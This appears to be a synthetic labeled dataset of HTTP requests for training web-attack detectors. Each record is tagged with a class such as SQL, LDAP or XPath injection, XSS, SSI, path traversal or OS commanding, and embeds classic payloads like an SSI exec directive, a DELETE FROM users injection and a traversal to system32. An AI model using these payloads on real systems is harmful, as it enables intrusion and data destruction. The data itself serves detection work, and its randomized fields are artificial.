Accept-Charset: iso-8859-9;q=0.4, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: bcf=emnjotc
Client-ip: 254.208.202.91
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="2"
Date: Tue, 29 Mar 05 02:27:06 UTC
ETag: "ruPgw4wQy@KHv4cvV"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 6.8
Pragma: raTi9='fdMirteo'
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: NTLM cnRhNGVTMGlocHRob2JlaXpxY3RNM3RoMUlpczVpaXJlQXQ=
Range: -392691
Referer: /prahBY/xttta/ruhseo/nietnP.aspx
TE: deflate;q=0.6,trailers
Trailer: Authorization
User-Agent: Mozilla/1.7 (X11; U; Solaris 1.3; a6-on; rv:0.2.6) Gecko/05891025
UA-CPU: MIPS
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.9 135.122.130.188, 9.4 www.3gticn.css, qs8r/8.7 158.76.181.97:9
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49201
Start - Id: 39477
class: SSI
PUT /eoelfsxnncg/dCUpZnfF4FRNpIJ1qw/J8T2Qp5L/cRykpdutiohiao9enaue/NTrg6rapmo9wN/nW/nvZnniAj/aMcv./etxNn9EgRyzmi.jpeg? HTTP/1.0
Content-Length: 77
Content-Language: Ee,ehUlas
Content-Encoding: deflate
Content-Location: /9trtbea/nNnat/hp6hmdBs/sHtm/tegoeo.mp3
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 15 Oct 05 18:06:49 UTC
Host: 234.34.210.41
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: *
Accept-Encoding: <!--#exec cgi="/cgi-bin/script?ftd"    -->
Accept-Language: dfvqwtse-so;q=0.4, 7b3r1irr-o, thtwn-sihEt1
Date: Thu, 19 Aug 04 21:11:12 CET
ETag: W/"mi47NeFVhtyS4lu7m8"
From: Oa2rItoG@nehz.gov
If-Unmodified-Since: Tue, 28 Apr 09 18:19:08 CET
If-Range: "fOn9ZdRppQRFIW.UUXe"
Max-Forwards: 5798
MIME-Version: 0.4
Pragma: aoBcgUt=xb0tewn
Proxy-Authorization: Digest cnonce="kn6ov"
Authorization: Digest nonce
Referer: http://hlalho.org/9blnl/utres/Htdzml/relib.wmn
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 8.1; ea-Me; rv:5.5.4) Gecko/22663908
Via: HTTP/7.9 168.202.38.49, noecks/8.3 www.E7ubs4ye.png:2089, 2.9 178.52.77.248
Transfer-Encoding: deflate
Upgrade: em0vat/5.4, ca3N/4.6, leaXft/1.7, ihz8D/8.7
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mlocationxp_D3NLxG1Rd=o&LmK.=l]lta&aou=7sfzaeteaytonit&ie=nbiiwindow.openet

End - Id: 39477
Start - Id: 35321
class: SqlInjection
GET /rJEGrmq.shtml?utorrrgebatt=htpassryehsetarcaee&Iclnbeeer=ielN+R+olcftp&jGLn=f&o7h2eHenH=weblmdasai&lqThKlog3GN=eymetaticmiQl&j0l7iQ1@=tioiaeHhAeese&msitsa=ial%3A&wvohsz=FnT&HCXnnc3c3fbp=ue+samssiei%28bt&om=+OR++2++%3E+1&jdSsIsOs1saheo=eNoDY9yGP%40&ulBkaarw=lefelezdrn&txyjucsrs5k=spdKL HTTP/1.0
Host: www.nei0eqtony.st:80
Connection: close
Accept: application/x-tar, text/*
Accept-Charset: euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: 8rteoe-u;q=0.5, T-u;q=0.6
Cache-Control: no-transform
Client-ip: 89.110.200.190
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="53"
Date: Wed, 02 Jan 08 20:06:02 UTC
ETag: W/"mz5K4DQH@Xm5ZhfU4"
Expect: 100-continue
From: tS3pEo@br4n.it
If-Modified-Since: Sun, 30 Nov 08 22:21:17 CET
If-Unmodified-Since: Thu, 28 Jul 05 09:37:58 CET
If-Match: "aWu0yGrm3AYZHG-Shd0"
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 0
MIME-Version: 4.0
Pragma: a='6ode'
Proxy-Authorization: Digest nc=0A24AbAd
Authorization: Basic cnVkeWRvZWY6bjBjZXR0
Range: 9898-,30840-71
Referer: http://ateeeaus.org/csg2totn/gbAl/sawntoo/e5wsstrn.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.1 (Windows; U; Win98 8.5; ba-so; rv:5.7.4) Gecko/26121895
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3700x2900
Via: 0.8 www.4lhAim.tiff, HTTP/8.0 www.aotgt.shtml, HTTP/4.2 www.moei.js
Transfer-Encoding: rYIn6e; anQLe=jgtermi
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35321
Start - Id: 39043
class: LdapInjection
PUT /nxCrVa-kROszU38aoZ05/xeamr0yNraa3grisa7/FccatXO/swewtFrssOad/ezVmS-u8tfKLAEvZ0Mzk.msf? HTTP/1.1
Content-Length: 243
Content-Language: seh,r77r2,tscsyaut
Content-Encoding: identity
Content-Location: /Bls3aSsc/imsdefDr/aoudo3tt/ogtniu.jpeg
Content-MD5: b3Vud2N0ZXRlbE9hYXJyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:57:48 CET
Last-Modified: Tue, 27 Nov 07 07:29:33 UTC
Host: www.1sj0Qsd.net
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: iso-8859-3;q=0.8, gb2312, x-mac-turkish;q=0.3
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: *;q=0.9
Cache-Control: min-fresh=0
Client-ip: 90.134.17.204
Cookie: estg=3;3oodhlNr=nep;aceeesacsoaeg=ver3ooeol|i;iieg4ssa=wfe7rqrp
Cookie2: $Version="6"
Date: Mon, 21 May 07 12:29:47 GMT
ETag: "uT3zZbW3UQjDV7lpt3"
Expect: nntee
From: fnnah@uEaahd3s.fr
If-Modified-Since: Fri, 22 Jan 10 04:42:47 GMT
If-Unmodified-Since: Wed, 20 Jun 07 22:21:49 UTC
If-Match: "Lm@4KT2ZDL7GJwP"
If-None-Match: "upYjAg9@_BHJct0"
If-Range: Thu, 06 Nov 08 16:50:36 CET
Max-Forwards: 7115
Pragma: aT=iiponfta
Proxy-Authorization: NTLM am90MGxhdDFlZXNpbWVPUmhsYWxrYmtvMmVlcmxsaHVsaGdlclRkQWlpMg==
Authorization: Basic aXN1ZDpwbEto
Range: -4
Referer: http://lAbln0.it/iodrL/sefT1naf/qIlit/esme.pdf
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/1.1 (compatible; seoaserFas; Open BSD i386; e1I4h; 2t4ctt)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color32
UA-Pixels: 183x5946
Via: SeW/1.1 www.irfw.jpeg, FTP/8.9 www.Aflca.shtml
Transfer-Encoding: gzip
Warning: 735 184.29.35.89 "oomiU03p" 
X-Forwarded-For: 135.35.56.107
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

bdijkoSydpsn=t2wdEz:arxha&idsvAtnwdaws=gt5&GSq3uqT=977&Ypzytfxjki=uavkedeSD&o3iatAalhg=3dobl&Jvh0P6d14=iminsock_streamfzh2no1t7Nt8o&n9hia=2228&asaw0vk=558&cU=66651&D5SHr5G=es]oesformwp-6a&rtdtpoa=hGvQGRuznCT&efhtoa=g0hieTeo0n8&hinxtB=28341

End - Id: 39043
Start - Id: 47968
class: XSS
GET /nioosss.msf?ov8eithit7=mc%26ejTeeelrt&vWJtidEk4=javascript%3A+++alert++%28%22sczm.0o%22%29&eslseEneiiin=iao%25%5B%3Cr3iincludeaie6ng&chq5haru5dre=9259386&hgiai=ineltrA%3F HTTP/1.1
Host: 99.246.111.90:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.2, windows-1254;q=0.9, x-mac-cyrillic;q=0.3, shift_jis;q=0.1, cp-950
Accept-Encoding: 
Accept-Language: me7payos-Esnsa;q=0.1, eQm-mz;q=0.1, utopidn-mS;q=0.5, i3hehn-2euoye, ucos-ciZoa
Cache-Control: no-cache
Client-ip: 132.116.1.254
Cookie: mY0home= e 7'
Cookie2: $Version="96"
Date: Mon, 13 Jun 05 03:24:32 UTC
ETag: "09Q5lWaU@8rfp_chN"
Expect: 100-continue
From: isoa@fisS8tee.org
If-Modified-Since: Fri, 22 Oct 04 03:46:17 UTC
If-Unmodified-Since: Mon, 08 Sep 08 05:56:52 GMT
If-Match: *
If-None-Match: "x_fmekkz9XmgoSr4mBbO"
If-Range: "8JaKfdegVSvYkPXq"
Max-Forwards: 6295
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Basic QXpSb255dTpsQTBk
Range: -89
Referer: /alla/ci5t04.aspx
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (compatible; MSIE 9.2; WinNT; dsute; iddsjiaroi; NzwLfeo)
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3364x532
Via: FTP/9.0 89.31.229.215
Transfer-Encoding: gzip
Upgrade: m0r/9.6, lyeto/5.9
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47968
Start - Id: 49779
class: XPathInjection
GET /tdwk6rhddridEp5/lYhLKa.geTx9TtxnH7R/hUN07h4AJNgg_c1z/atTnsMismHB/pm_XljAbUhktmH/mea/0Wpcmd/tcXpn/gLU5Z2jdEbM1TU6/yH2woVegpst.js?OpdkscriptZ7m=73062188&ec0tcaesPup=hJ1gmO-&t19n5lngvmdn=47&0pstdin7iddocumentai=103+++or+++aalna3%2FoNi%2FydiiNa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+++++or+91%3D&iiuwetneie=885&autoexecBU_3FCD=51735&bSfv=entexec&sbOwh=he&am6=wj5EKf&tAgtft4sa7h=mmte&LsystemS_replacexYD=40&eetn=tudllsesztootltO0 HTTP/1.0
Host: 116.78.255.167:80
Connection: rMbn
Accept: text/*, image/jpeg;q=0.0
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: ntsni-seoo;q=0.7
Cache-Control: min-fresh=95218
Client-ip: 227.62.139.89
Cookie: bxmailYmvSlS0=wdrimg7etAc($ity
Cookie2: $Version="909"
Date: Fri, 16 Jan 04 05:46:07 CET
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Wed, 03 Mar 04 06:06:58 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 39
MIME-Version: 6.9
Pragma: h0ed='rn01psab'
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: -43159,7-
Referer: /nlfe/lmIvls.cgi
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: hecnipwrAnahu
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.0 255.197.247.125, HTTP/5.4 www.cdma.gif, 6.8 www.aineuf.css
Transfer-Encoding: gzip
Upgrade: reoahn/2.3, btQ7il/2.0, ehd/9.6
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49779
Start - Id: 38535
class: LdapInjection
GET /wthttpO@/e@6YNwj-kUG/nhn50kttsayc8so/0dmHdunh/7C.php4?69yfC4T=+kne&ualrufezebe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&e7ANiu=okem%3B6nVz&aeutgetr=Oiolntekr6ssiRa&aser=623847 HTTP/1.1
Host: www.9altt.cz
Connection: keep-alive
Accept: text/*, application/*;q=0.9
Accept-Charset: iso-2022-jp, windows-1255, windows-1253
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=3879
Client-ip: 101.131.250.156
Cookie: Plh1HzsOoobaHt= @eaeioac:Ttexec2homeyct;n;U0zUexecT=eaaeowupdateiloml1;ehbEf=9017099
Cookie2: $Version="187"
Date: Wed, 11 Oct 06 13:39:00 CET
ETag: "isirvvJoG96lB0_5"
Expect: 100-continue
From: teee@ahlrhcs1d.org
If-Modified-Since: Thu, 12 Apr 07 13:08:09 UTC
If-Unmodified-Since: Thu, 28 Jul 05 23:59:25 GMT
If-Match: "z8DLD_b.OnZo@UGJk"
If-None-Match: *
If-Range: Tue, 30 Mar 10 05:24:32 CET
Max-Forwards: 2
MIME-Version: 8.2
Pragma: zui=rnsrd
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest uri=/tCeeltm/liir8ls/Yu5tEd.css
Range: 447-,158917-
Referer: /mntEz/rQtaeeyc/oNsTU/setnaga/5ups.php4
TE: deflate,trailers
Trailer: If-Range
User-Agent: rnebwt/0.4.1
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8726x4401
Via: HTTP/8.1 www.aOgo.htm, 1.8 www.odCou.jpg
Transfer-Encoding: compress
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38535
Start - Id: 35119
class: SqlInjection
POST /diRcB@Jeuon28/treoAseesrnNEsNhr/8RmRq9VoWszh/nWtKukYxLlVT.asp? HTTP/1.0
Content-Length: 254
Content-Language: ibaem,trs8as,nYl
Content-Encoding: gzip
Content-MD5: cHRybGN4YWVvNXN4bWZ5YQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 29 Mar 10 16:58:32 CET
Host: www.naznmctdI.de:761
Connection: keep-alive
Accept: audio/basic
Accept-Charset: windows-1255, x-mac-arabic
Accept-Encoding: *
Accept-Language: sE0N-ckTEwB, 9h8m2-meo3sd, ahiterm-rxothn;q=0.9, yo6ae3-tpeca1sd
Cache-Control: min-fresh=15337
Client-ip: 116.103.238.253
Date: Sat, 26 May 07 14:46:08 GMT
Expect: otivt=3rMnsoaS
If-Modified-Since: Thu, 05 Nov 09 23:21:39 UTC
If-None-Match: "IqZKmOoHrd@xw-iN6"
If-Range: Thu, 25 Mar 10 20:23:55 CET
Max-Forwards: 00
Pragma: uhEsfu='tduwihy'
Range: -61
Referer: /o8elms3/tlaaer/keNw/LqnntE.swf
User-Agent: edheStksg/1.3.3
UA-OS: Win98
Via: HTTP/4.0 www.dheit.png, eeiL/6.0 34.161.68.174, 5.5 48.178.177.62:54260
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

seTet=laut&bh45JWP=lnh- phth  ?@Qh0&hnfT6e5aee=t4IT &kbodyjCyXprmphpWU=a7a&QcmdeJdivQZIlikei=oa8zces'   );    DEL/**/ETE     FROM    users   WHERE   upper(username) =     upper( 'admin&amtPn2So.U=ccBoeA&5wovaP5vhttpV=rais&dt6=a)

End - Id: 35119
Start - Id: 44869
class: PathTransversal
GET /ilanaefEaoea3/nY9lmf/3vyBW4nUeOSVdmZs7c/rV6@w/r3QN@odYb4otp/nS/gahE6lozutuu7hwH/uosqUut0M/oslnsi9thinj/nmIU26P3_xwgAFn_gw_g.nsf?mykohtas3hyr=collection%28++++file%3A%2F%2F%2Fc%3A%2FUmo%2Fbesns.xml++++%29 HTTP/1.0
Host: www.acuxt.gov
Connection: close
Accept: audio/basic;q=0.2, application/*
Accept-Charset: cp-950;q=0.4, x-mac-turkish;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: 3ohosacd='o4en'
Client-ip: 32.25.74.7
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="6"
Date: Tue, 30 Nov 04 20:57:23 UTC
ETag: "1zhRIGqs9bhrirWiAR"
Expect: 100-continue
From: alne@9raesl8.gov
If-Modified-Since: Sat, 27 Mar 04 12:51:55 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: "pmfY041lx7FgKFTLov"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.3
Pragma: k=k
Proxy-Authorization: NTLM NmNUbGF0bWxpbm5MdEpOaElvZ2V0dG83dHJ0ME9xaXRnaGwzMXNpY2lzbQ==
Authorization: NTLM Y2M4dGFpZWxGcWNlZnNvb3RvZWFnZGF3ZnJieW9ycm95aW1jaXM=
Range: 165-47102,-98
Referer: http://www.ileoiil.cz/liie.sh
TE: trailers,deflate
Trailer: User-Agent
User-Agent: Mozilla/2.2 (X11; U; Open BSD i586 4.2; th-7u; rv:0.4.2) Gecko/74015749
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: lSived
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44869
Start - Id: 36943
class: LdapInjection
PUT /pGKUloQcvMewDin/roEt6au/uB9ZPrWHwC6uge7bwG/2mQRHZjB./AbsDRilnbcMoehf/Cv9ES61/1.ZuIPk.jpeg? HTTP/1.1
Content-Length: 314
Content-Language: r9exS
Content-Encoding: compress
Content-Location: http://dhe9aw.cz/E8sat/lumoIcl/iiap/olire.zip
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jul 06 06:29:07 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 228.244.184.148:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, cp-932, ks_c_5601-1987;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 28.240.217.24
Cookie: cgnoh3isanu=2t+pti4 5n1eyv;N0U8dYoKEe=2039;Omy=jEbody-tc;vZdmthvprocessing-instruction=26;WkWFtF_bGT=586473;gjsdouu=relinktsnnph-]aaobjecte
Cookie2: $Version="3"
Date: Tue, 19 May 09 10:10:39 UTC
ETag: "QOCuHnFfkzG-_szi_7"
Expect: ekDesr
From: ohnue@asue.fr
If-Modified-Since: Sun, 01 Jan 06 15:22:10 CET
If-Unmodified-Since: Thu, 18 Mar 10 22:22:38 GMT
If-Match: "U@qwX44gMrekPKD"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="Srg4"
Range: 060649-
Referer: /hErci/oejIRudI/taap/dyanv/asdr6Lp.php
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.9 (X11; U; Linux i586 7.5; mo-yu; rv:3.2.5) Gecko/75837849
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: identity
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OtBxtermnbOIdK=5u&sejeersanH= t'&et=fcfesle&fdecaeuh6shels=esheopese3nlrtT4s&fYc6-=)(  |   (displayName=had*)(name =   had*  )(  mail=had*    )&qHKVfYKUlibQvar9=s7Ro1&znadeinsde0ebk=(documentn(d&aTFZaAxLlUIY=zdOnphed&7nBasn9ruAlre=62202058&eOd4nym=tNl&omspIktaia=656&nraLorcnTl=uoiiQR

End - Id: 36943
Start - Id: 49496
class: XPathInjection
GET /ghdCubxP/eUahdp1sti/jsmuathi2eoweaeuov/aKsdOst/rrm9khemU2Eni.mspx?Daigp=loQrtseeffsn8c&tilms9hlr=oepeiseeb%28dinnpClmnv&t6a=rcp2e4%28beneytaueI&eJakas=53136243&ef9atqeelnh=58435&neroov=rV-I4B%40CmWy&itSeetr=oF10p6Amo3iia1y&qesc=mEzf%29wnsT&enirnn2mesn=9&na2adtdIraee=ynodeehpassthru+%29tselectr&xUlccho=etsi1rh6%27+or+++t%2F4%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D594%5D+++or+%27meWeei%27++%3D%27&owcEe=xyNmiime4gitjuaris HTTP/1.1
Host: 46.190.239.208
Connection: keep-alive
Accept: audio/*;q=0.1, text/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate;q=0.8, deflate, compress;q=0.4, deflate;q=0.2
Accept-Language: qa-Sep8eWn, uewotsei-chOf, 6atpwwso-nma1ie, wsjp-s;q=0.5
Cache-Control: no-transform
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Wed, 05 Mar 08 02:19:46 GMT
ETag: "JDg6S18LaQ9Ja_0YULOc"
Expect: iisFe6l=Ebbtsth;mie7ote=wwewriuc
From: heDlu@i6la6.fr
If-Modified-Since: Mon, 04 Jan 10 18:28:22 CET
If-Unmodified-Since: Tue, 05 Sep 06 17:04:25 CET
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: "iMfXCeqwU5.17ekm"
If-Range: Tue, 06 Mar 07 19:01:58 CET
Max-Forwards: 2683
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: urdmey er4o=atlis
Range: 731-
Referer: /vdyweatt/okvecyU/tsstm/pp3elafA.aspx
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 2.0; at-9h; rv:6.3.4) Gecko/44979252
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: 3.0 www.ytwsmu.tiff, uwleb/5.9 www.gpMAih.jpeg
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 769 www.giteyoe.png "lena5ieoo" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49496
Start - Id: 44419
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.gev3r4cs.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.7, iso-8859-8-i, x-mac-arabic;q=0.8, iso-2022-jp;q=0.5, x-mac-arabic;q=0.5
Accept-Encoding: *
Accept-Language: me5jjet-6Sxqh, SthznE-iStn;q=0.6, arcit0Di-znnb;q=0.6, oalo-rnb, l-i6yngu;q=0.3
Cache-Control: no-cache
Client-ip: 211.226.85.152
Cookie: hRsuh7=odRFiralrnd\ih
Cookie2: $Version="352"
Date: Wed, 15 Jun 05 09:46:13 CET
ETag: W/"9DlqrmBByHGPWvxbgG"
Expect: qeSl8a=erci;preie
From: i1nh90u@tvpyl.biz
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Tue, 10 Oct 06 03:50:38 GMT
If-Match: "H@J1tp@WMbjABoS@4"
If-None-Match: "Mn5Mz2@cIHYZzIO8iZ0k"
If-Range: *
Max-Forwards: 074
MIME-Version: 6.2
Pragma: a2rsn=mseL4a
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://www.atnetRg.st/azoBsho.php
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 1.9; it-to; rv:6.9.1) Gecko/80041426
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: compress
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44419
Start - Id: 39245
class: SSI
GET /beotiw/tnals8sulDdlgibhon.php?t0hssefrnd=iJnqthK&1BeuWS5FD5script=ide%2Be&udso7k4oio4m=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 178.126.136.222:80
Connection: Nhcve9Th
Accept: audio/*;q=0.5, video/quicktime;q=0.0, text/*
Accept-Charset: x-mac-arabic, iso-8859-8;q=0.3, cp-950
Accept-Encoding: compress;q=0.4
Accept-Language: pE-rno3Ht;q=0.5, E5-henEftha, 9genrue5-ih
Cache-Control: no-transform
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="7"
Date: Mon, 10 Nov 08 18:10:44 GMT
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Wed, 27 May 09 06:34:13 GMT
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: *
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 224
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bGhvaW90T3VuYjlhYXRtcnNOb3BMd256YzBjdWFld2NlaUlpbDV4
Authorization: NTLM c250cnlGYWlvdVJaZ0VxdHM4Tm9yZnJ0ZDBoZm9sdGVm
Range: 5-9725,-6683
Referer: /nplyms/tdie/4adye/oton3aIi.cgi
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: aecqeezy/0.2.3.9
UA-CPU: MIPS
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 9.3 www.er7tH.htm, 3.8 106.109.231.153:45982, 4.5 www.eebSfTx0.tiff:21
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39245
Start - Id: 35549
class: XPathInjection
PUT /ao9rBpjRfF/NTd/goe/2DrbQJNEi/udblfmd1wrkrhe/qxnoaosaqn.asmx? HTTP/1.0
Content-Length: 394
Content-Language: txl,cagk
Content-Encoding: compress
Content-Location: http://www.Lnxiorb.be/xrttias/lyeoE.asp
Content-MD5: ZWlodHJjbjBhRWttZTllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Jul 06 14:07:23 GMT
Last-Modified: Thu, 12 Nov 09 20:53:59 UTC
Host: 116.31.110.183
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.8, compress, identity;q=0.3, identity;q=0.2, gzip
Accept-Language: Ss5isalw-apn, cwvtni-of, gnq5ct-vtadate
Cache-Control: no-store
